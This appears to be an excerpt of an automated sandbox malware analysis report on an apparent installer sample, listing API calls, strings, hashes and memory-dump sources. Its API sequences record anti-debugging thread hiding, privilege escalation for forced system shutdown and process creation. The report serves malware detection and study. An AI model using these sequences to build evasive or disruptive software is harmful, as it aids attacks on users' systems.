                                                          • Opcode Fuzzy Hash: 2aa522b5ebb439bcd979fbae0c30a490788c47600126530c878949cb2d2a5458
                                                          • Instruction Fuzzy Hash: 2031F271159B01CFE320CF24CCA87C6B7A3AF96318F294E1DC0A65BE91DB79740A9B51
                                                          APIs
                                                          • GetCurrentThread.KERNEL32 ref: 6C513E9D
                                                          • NtSetInformationThread.NTDLL(00000000,00000011,00000000,00000000), ref: 6C513EAA
                                                          Memory Dump Source
                                                          • Source File: 00000007.00000002.1687255835.000000006C511000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C510000, based on PE: true
                                                          • Associated: 00000007.00000002.1687222213.000000006C510000.00000002.00000001.01000000.00000009.sdmp
                                                          • Associated: 00000007.00000002.1688607943.000000006C6B8000.00000002.00000001.01000000.00000009.sdmp
                                                          • Associated: 00000007.00000002.1688683286.000000006C6C8000.00000008.00000001.01000000.00000009.sdmp
                                                          • Associated: 00000007.00000002.1689449994.000000006C793000.00000004.00000001.01000000.00000009.sdmp
                                                          • Associated: 00000007.00000002.1689513877.000000006C799000.00000020.00000001.01000000.00000009.sdmp
                                                          • Associated: 00000007.00000002.1690286574.000000006C882000.00000002.00000001.01000000.00000009.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_7_2_6c510000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                                          Similarity
                                                          • API ID: Thread$CurrentInformation
                                                          • String ID:
                                                          • API String ID: 1650627709-0
                                                          • Opcode ID: c8ead7b125dcb314672ffefbe7f5001f2aee0f16ce1c99d6f70aa4450f94c884
                                                          • Instruction ID: 5687a421fafee47e88275ae8762de78756b37cbaa5316437ad5f5aaf8e5fefe7
                                                          • Opcode Fuzzy Hash: c8ead7b125dcb314672ffefbe7f5001f2aee0f16ce1c99d6f70aa4450f94c884
                                                          • Instruction Fuzzy Hash: EB310F31108701CFE720CF28C8A8796B7A6AF86308F254E1DC0E64BE81DB71B449CB92
                                                          APIs
                                                          • GetCurrentThread.KERNEL32 ref: 6C513E9D
                                                          • NtSetInformationThread.NTDLL(00000000,00000011,00000000,00000000), ref: 6C513EAA
                                                          Memory Dump Source
                                                          • Source File: 00000007.00000002.1687255835.000000006C511000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C510000, based on PE: true
                                                          • Associated: 00000007.00000002.1687222213.000000006C510000.00000002.00000001.01000000.00000009.sdmp
                                                          • Associated: 00000007.00000002.1688607943.000000006C6B8000.00000002.00000001.01000000.00000009.sdmp
                                                          • Associated: 00000007.00000002.1688683286.000000006C6C8000.00000008.00000001.01000000.00000009.sdmp
                                                          • Associated: 00000007.00000002.1689449994.000000006C793000.00000004.00000001.01000000.00000009.sdmp
                                                          • Associated: 00000007.00000002.1689513877.000000006C799000.00000020.00000001.01000000.00000009.sdmp
                                                          • Associated: 00000007.00000002.1690286574.000000006C882000.00000002.00000001.01000000.00000009.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_7_2_6c510000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                                          Similarity
                                                          • API ID: Thread$CurrentInformation
                                                          • String ID:
                                                          • API String ID: 1650627709-0
                                                          • Opcode ID: 80633dc29eaf2cf5a97c6a8a3035929e67c016fe919b539ef7032833d126cc2a
                                                          • Instruction ID: 9b48c0bb329d1cedbbaa90b4b9b9b4125f4f6eb4ed7b0bd95141deae7b8b1d0b
                                                          • Opcode Fuzzy Hash: 80633dc29eaf2cf5a97c6a8a3035929e67c016fe919b539ef7032833d126cc2a
                                                          • Instruction Fuzzy Hash: 0321F47015C701CFE324CF64CCA879677B6AF46318F144E2DC0A68BE90DB75B4489B52
                                                          APIs
                                                          • OpenSCManagerA.SECHOST(00000000,00000000,00000001), ref: 6C695130
                                                          Memory Dump Source
                                                          • Source File: 00000007.00000002.1687255835.000000006C511000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C510000, based on PE: true
                                                          • Associated: 00000007.00000002.1687222213.000000006C510000.00000002.00000001.01000000.00000009.sdmp
                                                          • Associated: 00000007.00000002.1688607943.000000006C6B8000.00000002.00000001.01000000.00000009.sdmp
                                                          • Associated: 00000007.00000002.1688683286.000000006C6C8000.00000008.00000001.01000000.00000009.sdmp
                                                          • Associated: 00000007.00000002.1689449994.000000006C793000.00000004.00000001.01000000.00000009.sdmp
                                                          • Associated: 00000007.00000002.1689513877.000000006C799000.00000020.00000001.01000000.00000009.sdmp
                                                          • Associated: 00000007.00000002.1690286574.000000006C882000.00000002.00000001.01000000.00000009.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_7_2_6c510000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                                          Similarity
                                                          • API ID: ManagerOpen
                                                          • String ID:
                                                          • API String ID: 1889721586-0
                                                          • Opcode ID: 5cc81ea195e6444c5bd0d03724d100e8aaf2069115b79c71d14dd6e96fda0f6a
                                                          • Instruction ID: 9487c23b32f8242ade45902a23672f8fa61e5dd8dcc24b452af732fab6d8af6f
                                                          • Opcode Fuzzy Hash: 5cc81ea195e6444c5bd0d03724d100e8aaf2069115b79c71d14dd6e96fda0f6a
                                                          • Instruction Fuzzy Hash: EB3128B4608342EFC710CF28C584B4ABBF0EB89755F508A6EF998C6360C371C9499B67
                                                          APIs
                                                          • FindFirstFileA.KERNEL32(?,?), ref: 6C68AEDC
                                                          Memory Dump Source
                                                          • Source File: 00000007.00000002.1687255835.000000006C511000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C510000, based on PE: true
                                                          • Associated: 00000007.00000002.1687222213.000000006C510000.00000002.00000001.01000000.00000009.sdmp
                                                          • Associated: 00000007.00000002.1688607943.000000006C6B8000.00000002.00000001.01000000.00000009.sdmp
                                                          • Associated: 00000007.00000002.1688683286.000000006C6C8000.00000008.00000001.01000000.00000009.sdmp
                                                          • Associated: 00000007.00000002.1689449994.000000006C793000.00000004.00000001.01000000.00000009.sdmp
                                                          • Associated: 00000007.00000002.1689513877.000000006C799000.00000020.00000001.01000000.00000009.sdmp
                                                          • Associated: 00000007.00000002.1690286574.000000006C882000.00000002.00000001.01000000.00000009.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_7_2_6c510000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                                          Similarity
                                                          • API ID: FileFindFirst
                                                          • String ID:
                                                          • API String ID: 1974802433-0
                                                          • Opcode ID: 9f2b22aae14be8562f36e2e884df30d6b21fd13c872815ff4ae30684644f3200
                                                          • Instruction ID: 523e4d1fb9664409397be2cc66052226d8162cba69e657e133d768e3c48d2437
                                                          • Opcode Fuzzy Hash: 9f2b22aae14be8562f36e2e884df30d6b21fd13c872815ff4ae30684644f3200
                                                          • Instruction Fuzzy Hash: 7B1155B040A380AFD7108E28D44445EBBE4BF8A315F148E59F8A8CB7D2D334CC848B2A
                                                          APIs
                                                          • ReadFile.KERNEL32(?,?,00001000,?,00000000), ref: 6C66ABA7
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000007.00000002.1687255835.000000006C511000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C510000, based on PE: true
                                                          • Associated: 00000007.00000002.1687222213.000000006C510000.00000002.00000001.01000000.00000009.sdmp
                                                          • Associated: 00000007.00000002.1688607943.000000006C6B8000.00000002.00000001.01000000.00000009.sdmp
                                                          • Associated: 00000007.00000002.1688683286.000000006C6C8000.00000008.00000001.01000000.00000009.sdmp
                                                          • Associated: 00000007.00000002.1689449994.000000006C793000.00000004.00000001.01000000.00000009.sdmp
                                                          • Associated: 00000007.00000002.1689513877.000000006C799000.00000020.00000001.01000000.00000009.sdmp
                                                          • Associated: 00000007.00000002.1690286574.000000006C882000.00000002.00000001.01000000.00000009.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_7_2_6c510000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                                          Similarity
                                                          • API ID: FileRead
                                                          • String ID: $53N!$53N!$H$I_#]$J_#]$J_#]$Y<Uq$Y<Uq$\|n/$\|n/$\|n/$\|n/$\|n/$\|n/$\|n/$\|n/$\|n/$f@n`$f@n`$jinc$|
                                                          • API String ID: 2738559852-1563143607
                                                          • Opcode ID: a3d69fc28794041803f55125f3a3fa3ba80d13e9ded7fc97a29b1855dba788b0
                                                          • Instruction ID: afc9c3d8bef265b729fe5fb0999ea2b7b4974f19684ec5e3d0e30fdbd3ec5ad9
                                                          • Opcode Fuzzy Hash: a3d69fc28794041803f55125f3a3fa3ba80d13e9ded7fc97a29b1855dba788b0
                                                          • Instruction Fuzzy Hash: 6162497060D381CFC724CF29C490AAABBE2ABD9304F14891EF599CBB52D735D8459B47

                                                          Control-flow Graph

                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000007.00000002.1687255835.000000006C511000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C510000, based on PE: true
                                                          • Associated: 00000007.00000002.1687222213.000000006C510000.00000002.00000001.01000000.00000009.sdmp
                                                          • Associated: 00000007.00000002.1688607943.000000006C6B8000.00000002.00000001.01000000.00000009.sdmp
                                                          • Associated: 00000007.00000002.1688683286.000000006C6C8000.00000008.00000001.01000000.00000009.sdmp
                                                          • Associated: 00000007.00000002.1689449994.000000006C793000.00000004.00000001.01000000.00000009.sdmp
                                                          • Associated: 00000007.00000002.1689513877.000000006C799000.00000020.00000001.01000000.00000009.sdmp
                                                          • Associated: 00000007.00000002.1690286574.000000006C882000.00000002.00000001.01000000.00000009.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_7_2_6c510000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: 8Q
                                                          • API String ID: 0-4022487301
                                                          • Opcode ID: 4247e5974834ddf46d6844dbb905cbbca3f3f3d5b57187fe0ef2fdeb2ea23fc0
                                                          • Instruction ID: eb1cb6e0ef14edbc601f6c483c54c2c798a05e57b7dea41e4b45a539faad52ce
                                                          • Opcode Fuzzy Hash: 4247e5974834ddf46d6844dbb905cbbca3f3f3d5b57187fe0ef2fdeb2ea23fc0
                                                          • Instruction Fuzzy Hash: 4DC1B270A04259BBDF01EFD9C880BADBBB0BF4A318F104159E516ABB41C7729D47CB69

                                                          Control-flow Graph

                                                          APIs
                                                            • Part of subcall function 6C6B4457: CreateFileW.KERNEL32(00000000,00000000,?,6C6B4115,?,?,00000000,?,6C6B4115,00000000,0000000C), ref: 6C6B4474
                                                          • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C6B4180
                                                          • __dosmaperr.LIBCMT ref: 6C6B4187
                                                          • GetFileType.KERNEL32(00000000), ref: 6C6B4193
                                                          • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C6B419D
                                                          • __dosmaperr.LIBCMT ref: 6C6B41A6
                                                          • CloseHandle.KERNEL32(00000000), ref: 6C6B41C6
                                                          • CloseHandle.KERNEL32(6C6AB0D0), ref: 6C6B4313
                                                          • GetLastError.KERNEL32 ref: 6C6B4345
                                                          • __dosmaperr.LIBCMT ref: 6C6B434C
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000007.00000002.1687255835.000000006C511000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C510000, based on PE: true
• Associated: 00000007.00000002.1687222213.000000006C510000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000007.00000002.1688607943.000000006C6B8000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000007.00000002.1688683286.000000006C6C8000.00000008.00000001.01000000.00000009.sdmp
• Associated: 00000007.00000002.1689449994.000000006C793000.00000004.00000001.01000000.00000009.sdmp
• Associated: 00000007.00000002.1689513877.000000006C799000.00000020.00000001.01000000.00000009.sdmp
• Associated: 00000007.00000002.1690286574.000000006C882000.00000002.00000001.01000000.00000009.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_7_2_6c510000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                                          Similarity
                                                          • API ID: ErrorLast__dosmaperr$CloseFileHandle$CreateType
                                                          • String ID: 8Q
                                                          • API String ID: 4237864984-4022487301
                                                          • Opcode ID: 4b550a672b939727e72043f7dd5d5a1e780675054ad4ee0fc4974409a50e128a
                                                          • Instruction ID: eda345127fc5cb0b4a80c471db29791bf426666e553a28b730431bc7a2bdfea0
                                                          • Opcode Fuzzy Hash: 4b550a672b939727e72043f7dd5d5a1e780675054ad4ee0fc4974409a50e128a
                                                          • Instruction Fuzzy Hash: 38A14632A041559FCF08CF68D891BFE7BB0AF07328F180259E811BB791CBB58926C759

Control-flow Graph
• Control-flow graph rendering residue (node and edge list omitted). Function entry: 6c66c1e0. Referenced APIs: WriteFile, ReadFile. Internal calls: 6c696b70, 6c69b3a0, 6c69b920.
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000007.00000002.1687255835.000000006C511000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C510000, based on PE: true
• Associated: 00000007.00000002.1687222213.000000006C510000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000007.00000002.1688607943.000000006C6B8000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000007.00000002.1688683286.000000006C6C8000.00000008.00000001.01000000.00000009.sdmp
• Associated: 00000007.00000002.1689449994.000000006C793000.00000004.00000001.01000000.00000009.sdmp
• Associated: 00000007.00000002.1689513877.000000006C799000.00000020.00000001.01000000.00000009.sdmp
• Associated: 00000007.00000002.1690286574.000000006C882000.00000002.00000001.01000000.00000009.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_7_2_6c510000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: :uW$;uW$;uW$> 4!$> 4!
                                                          • API String ID: 0-4100612575
                                                          • Opcode ID: 54d08d8b60c38e6d08ffd2ade88279a3bf1a63a59584e6607bc051eaa69c7efd
                                                          • Instruction ID: 54df0bfbe7f26cc0e60224093cdf398ae5f5f9fdf7cdfe79864ab62ab13086cf
                                                          • Opcode Fuzzy Hash: 54d08d8b60c38e6d08ffd2ade88279a3bf1a63a59584e6607bc051eaa69c7efd
                                                          • Instruction Fuzzy Hash: 03717CB0208745AFDB10DF56C880B9ABBF4BF8A708F10492EF499D7A50D771D8489B97
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000007.00000002.1687255835.000000006C511000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C510000, based on PE: true
• Associated: 00000007.00000002.1687222213.000000006C510000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000007.00000002.1688607943.000000006C6B8000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000007.00000002.1688683286.000000006C6C8000.00000008.00000001.01000000.00000009.sdmp
• Associated: 00000007.00000002.1689449994.000000006C793000.00000004.00000001.01000000.00000009.sdmp
• Associated: 00000007.00000002.1689513877.000000006C799000.00000020.00000001.01000000.00000009.sdmp
• Associated: 00000007.00000002.1690286574.000000006C882000.00000002.00000001.01000000.00000009.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_7_2_6c510000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: K?Jo$K?Jo$`Rlx$7eO
                                                          • API String ID: 0-174837320
                                                          • Opcode ID: 4c4d7ddd165121c55145b156e2e54366ee01a5807cb315236f66721cbd2481c7
                                                          • Instruction ID: 047fec6cd24db84cd07bc4c5900edcb7f0545b3c8ad512d700256ed1cd6d2665
                                                          • Opcode Fuzzy Hash: 4c4d7ddd165121c55145b156e2e54366ee01a5807cb315236f66721cbd2481c7
                                                          • Instruction Fuzzy Hash: BE4245B4609342DFCB54CF2AC090A5ABBE1AFC9314F24891EF5958BB20D634D845DF5B
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000007.00000002.1687255835.000000006C511000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C510000, based on PE: true
• Associated: 00000007.00000002.1687222213.000000006C510000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000007.00000002.1688607943.000000006C6B8000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000007.00000002.1688683286.000000006C6C8000.00000008.00000001.01000000.00000009.sdmp
• Associated: 00000007.00000002.1689449994.000000006C793000.00000004.00000001.01000000.00000009.sdmp
• Associated: 00000007.00000002.1689513877.000000006C799000.00000020.00000001.01000000.00000009.sdmp
• Associated: 00000007.00000002.1690286574.000000006C882000.00000002.00000001.01000000.00000009.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_7_2_6c510000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: ;T55
                                                          • API String ID: 0-2572755013
                                                          • Opcode ID: 9c373c70a8837a996f9877b9ee99a80c0e32e1f716408ecfe2109c8f650d9259
                                                          • Instruction ID: f75319403e15c9a4a0ebddb82ad0dcaa3283c2febf804e03388418c92334b2da
                                                          • Opcode Fuzzy Hash: 9c373c70a8837a996f9877b9ee99a80c0e32e1f716408ecfe2109c8f650d9259
                                                          • Instruction Fuzzy Hash: B303D431645B018FC728CF28CCD0695B7E3AFD53287598F6DC0AA4BA95D778B44ACB50

Control-flow Graph
• Control-flow graph rendering residue (node and edge list omitted). Function entry: 6c694ff0. Referenced APIs: CreateProcessA, WaitForSingleObject, CloseHandle (called twice). No internal calls recorded.
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000007.00000002.1687255835.000000006C511000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C510000, based on PE: true
• Associated: 00000007.00000002.1687222213.000000006C510000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000007.00000002.1688607943.000000006C6B8000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000007.00000002.1688683286.000000006C6C8000.00000008.00000001.01000000.00000009.sdmp
• Associated: 00000007.00000002.1689449994.000000006C793000.00000004.00000001.01000000.00000009.sdmp
• Associated: 00000007.00000002.1689513877.000000006C799000.00000020.00000001.01000000.00000009.sdmp
• Associated: 00000007.00000002.1690286574.000000006C882000.00000002.00000001.01000000.00000009.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_7_2_6c510000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                                          Similarity
                                                          • API ID: CreateProcess
                                                          • String ID: D
                                                          • API String ID: 963392458-2746444292
                                                          • Opcode ID: 39ad0b01810e3b4213fbc595adf2732b3a795c2ea0da1939dd78f5ead9eaa115
                                                          • Instruction ID: 93bec23deb3f8242f2e8c150456fc6a093fd09aa1ab2afa9c1a16883188dfb2c
                                                          • Opcode Fuzzy Hash: 39ad0b01810e3b4213fbc595adf2732b3a795c2ea0da1939dd78f5ead9eaa115
                                                          • Instruction Fuzzy Hash: BD3102708093818FD740DF28C19876EBBF0EB8A318F405A1DF8E986250E7759589CF47

Control-flow Graph
• Control-flow graph rendering residue (node and edge list omitted). Function entry: 6c6abc5e. Referenced APIs: WriteFile, GetLastError. Internal calls: 6c69f9df, 6c69f9cc, 6c6a0120, 6c6abe40, 6c6aac69, 6c6abeb1, 6c6ac2c3, 6c6ac25b, 6c6ac487, 6c6ac39e, 6c69f9f2.
                                                          APIs
                                                            • Part of subcall function 6C6ABEB1: GetConsoleCP.KERNEL32(?,6C6AB0D0,?), ref: 6C6ABEF9
                                                          • WriteFile.KERNEL32(?,?,6C6B46EC,00000000,00000000,?,00000000,00000000,6C6B5AB6,00000000,00000000,?,00000000,6C6AB0D0,6C6B46EC,00000000), ref: 6C6ABDAF
                                                          • GetLastError.KERNEL32(?,?,?,?,?,?,?,6C6B46EC,6C6AB0D0,00000000,?,?,?,?,00000000,?), ref: 6C6ABDB9
                                                          • __dosmaperr.LIBCMT ref: 6C6ABDFE
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000007.00000002.1687255835.000000006C511000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C510000, based on PE: true
• Associated: 00000007.00000002.1687222213.000000006C510000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000007.00000002.1688607943.000000006C6B8000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000007.00000002.1688683286.000000006C6C8000.00000008.00000001.01000000.00000009.sdmp
• Associated: 00000007.00000002.1689449994.000000006C793000.00000004.00000001.01000000.00000009.sdmp
• Associated: 00000007.00000002.1689513877.000000006C799000.00000020.00000001.01000000.00000009.sdmp
• Associated: 00000007.00000002.1690286574.000000006C882000.00000002.00000001.01000000.00000009.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_7_2_6c510000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                                          Similarity
                                                          • API ID: ConsoleErrorFileLastWrite__dosmaperr
                                                          • String ID: 8Q
                                                          • API String ID: 251514795-4022487301
                                                          • Opcode ID: 0cd68032b707fa77b813e10cefa7ad283d3969a4e01870fd6c37e7591b491c8c
                                                          • Instruction ID: 75396f9525a2b020312076944d7ecbdb06e8d8cdf0bf7862d7c826a4814afba3
                                                          • Opcode Fuzzy Hash: 0cd68032b707fa77b813e10cefa7ad283d3969a4e01870fd6c37e7591b491c8c
                                                          • Instruction Fuzzy Hash: E851C171A0420EBFDB019FE8C880FEEBBB9EF86358F140551E500ABA51D7719D4787A9

Control-flow Graph
• Control-flow graph rendering residue (node and edge list omitted). Function entry: 6c695b90. No Win32 APIs referenced directly. Internal calls: 6c5601f0, 6c6a0b18, 6c562250, 6c562340, 6c699379, 6c55e010, 6c697088.
                                                          APIs
                                                          • std::ios_base::_Ios_base_dtor.LIBCPMT ref: 6C695D31
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000007.00000002.1687255835.000000006C511000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C510000, based on PE: true
• Associated: 00000007.00000002.1687222213.000000006C510000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000007.00000002.1688607943.000000006C6B8000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000007.00000002.1688683286.000000006C6C8000.00000008.00000001.01000000.00000009.sdmp
• Associated: 00000007.00000002.1689449994.000000006C793000.00000004.00000001.01000000.00000009.sdmp
• Associated: 00000007.00000002.1689513877.000000006C799000.00000020.00000001.01000000.00000009.sdmp
• Associated: 00000007.00000002.1690286574.000000006C882000.00000002.00000001.01000000.00000009.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_7_2_6c510000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                                          Similarity
                                                          • API ID: Ios_base_dtorstd::ios_base::_
                                                          • String ID: ios_base::badbit set$ios_base::eofbit set$ios_base::failbit set
                                                          • API String ID: 323602529-1866435925
                                                          • Opcode ID: b841409b7fb9e8372c5b90ea066634f9d69662c615ef572ab4aa007662a874cb
                                                          • Instruction ID: 96adc159ae3a44071592d7e9fcf3438d7fb26128073375937666a34f7ebf538c
                                                          • Opcode Fuzzy Hash: b841409b7fb9e8372c5b90ea066634f9d69662c615ef572ab4aa007662a874cb
                                                          • Instruction Fuzzy Hash: BE5134B5A00B008FD725CF29C895B97BBF1FB89318F408A2DD89647B90D775B909CB94

Control-flow Graph
• Control-flow graph rendering residue (node and edge list omitted). Function entry: 6c6ab925. Referenced APIs: CloseHandle, GetLastError. Internal calls: 6c6b15a2, 6c6b171f, 6c69f9f2.
                                                          APIs
                                                          • CloseHandle.KERNEL32(00000000,?,00000000,?,6C6B425F), ref: 6C6AB97B
                                                          • GetLastError.KERNEL32(?,00000000,?,6C6B425F), ref: 6C6AB985
                                                          • __dosmaperr.LIBCMT ref: 6C6AB9B0
                                                          Memory Dump Source
                                                          • Source File: 00000007.00000002.1687255835.000000006C511000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C510000, based on PE: true
• Associated: 00000007.00000002.1687222213.000000006C510000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000007.00000002.1688607943.000000006C6B8000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000007.00000002.1688683286.000000006C6C8000.00000008.00000001.01000000.00000009.sdmp
• Associated: 00000007.00000002.1689449994.000000006C793000.00000004.00000001.01000000.00000009.sdmp
• Associated: 00000007.00000002.1689513877.000000006C799000.00000020.00000001.01000000.00000009.sdmp
• Associated: 00000007.00000002.1690286574.000000006C882000.00000002.00000001.01000000.00000009.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_7_2_6c510000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                                          Similarity
                                                          • API ID: CloseErrorHandleLast__dosmaperr
                                                          • String ID:
                                                          • API String ID: 2583163307-0
                                                          • Opcode ID: 1843ed7c4d38ef84aa2b5b85c81b8fedc2c14d7b4fa9c87b3cf72b1a02d7f7b1
                                                          • Instruction ID: 2d5f1ed526275f37999687bbc99facf8f95c778b0247f906469ec0163bb0dbad
                                                          • Opcode Fuzzy Hash: 1843ed7c4d38ef84aa2b5b85c81b8fedc2c14d7b4fa9c87b3cf72b1a02d7f7b1
                                                          • Instruction Fuzzy Hash: 0B014E33A5912C2AC20006BA94457AD77694FC373CF29036DE81997AC1DF71CC9B839C

Control-flow Graph
• Control-flow graph rendering residue (node and edge list omitted). Function entry: 6c6a0b9c. No Win32 APIs referenced directly. Internal calls: 6c69f9cc, 6c6a0120, 6c6a0cb9, 6c6a873e, 6c6a9c60, 6c6ab898, 6c6aae75, 6c6a47bb.
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000007.00000002.1687255835.000000006C511000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C510000, based on PE: true
• Associated: 00000007.00000002.1687222213.000000006C510000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000007.00000002.1688607943.000000006C6B8000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000007.00000002.1688683286.000000006C6C8000.00000008.00000001.01000000.00000009.sdmp
• Associated: 00000007.00000002.1689449994.000000006C793000.00000004.00000001.01000000.00000009.sdmp
• Associated: 00000007.00000002.1689513877.000000006C799000.00000020.00000001.01000000.00000009.sdmp
• Associated: 00000007.00000002.1690286574.000000006C882000.00000002.00000001.01000000.00000009.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_7_2_6c510000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: 8Q
                                                          • API String ID: 0-4022487301
                                                          • Opcode ID: 0eceabb69cc212cdc16fe4ea4eed4d534fb07063be66ce5869ee3001f537518c
                                                          • Instruction ID: 03ad40331bdb71c61c150dc1f2fc3d4bb55a497095be6381684fbe9f7a94dd3f
                                                          • Opcode Fuzzy Hash: 0eceabb69cc212cdc16fe4ea4eed4d534fb07063be66ce5869ee3001f537518c
                                                          • Instruction Fuzzy Hash: 4FF0F4725016547AC6211EE98D00BDB36989F8337CF200725E86793ED1DB75DC0BC6AD
                                                          APIs
                                                          • std::ios_base::_Ios_base_dtor.LIBCPMT ref: 6C695AB4
                                                          • std::ios_base::_Ios_base_dtor.LIBCPMT ref: 6C695AF4
                                                          Memory Dump Source
                                                          • Source File: 00000007.00000002.1687255835.000000006C511000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C510000, based on PE: true
• Associated: 00000007.00000002.1687222213.000000006C510000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000007.00000002.1688607943.000000006C6B8000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000007.00000002.1688683286.000000006C6C8000.00000008.00000001.01000000.00000009.sdmp
• Associated: 00000007.00000002.1689449994.000000006C793000.00000004.00000001.01000000.00000009.sdmp
• Associated: 00000007.00000002.1689513877.000000006C799000.00000020.00000001.01000000.00000009.sdmp
• Associated: 00000007.00000002.1690286574.000000006C882000.00000002.00000001.01000000.00000009.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_7_2_6c510000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                                          Similarity
                                                          • API ID: Ios_base_dtorstd::ios_base::_
                                                          • String ID:
                                                          APIs
                                                          • GetLastError.KERNEL32(6C6C6DD8,0000000C), ref: 6C69EF52
                                                          • ExitThread.KERNEL32 ref: 6C69EF59
                                                          Similarity
                                                          • API ID: ErrorExitLastThread
                                                          • String ID:
                                                          APIs
                                                          Similarity
                                                          • API ID: __wsopen_s
                                                          • String ID:
                                                          APIs
                                                          Similarity
                                                          • API ID: _free
                                                          • String ID:
                                                          APIs
                                                          • CreateFileW.KERNEL32(00000000,00000000,?,6C6B4115,?,?,00000000,?,6C6B4115,00000000,0000000C), ref: 6C6B4474
                                                          Similarity
                                                          • API ID: CreateFile
                                                          • String ID:
                                                          APIs
                                                          Strings
                                                          Similarity
                                                          • API ID: _strlen
                                                          • String ID: g)''
                                                          APIs
                                                          • GetCurrentProcess.KERNEL32 ref: 6C695D6A
                                                          • OpenProcessToken.ADVAPI32(00000000,00000028), ref: 6C695D76
                                                          • LookupPrivilegeValueW.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 6C695D84
                                                          • AdjustTokenPrivileges.ADVAPI32(?,00000000,00000001,00000000,00000000,00000000), ref: 6C695DAB
                                                          • NtInitiatePowerAction.NTDLL ref: 6C695DBF
                                                          Strings
                                                          Similarity
                                                          • API ID: ProcessToken$ActionAdjustCurrentInitiateLookupOpenPowerPrivilegePrivilegesValue
                                                          • String ID: SeShutdownPrivilege
                                                          Strings
                                                          Similarity
                                                          • API ID:
                                                          • String ID: \j`7$\j`7$j
                                                          APIs
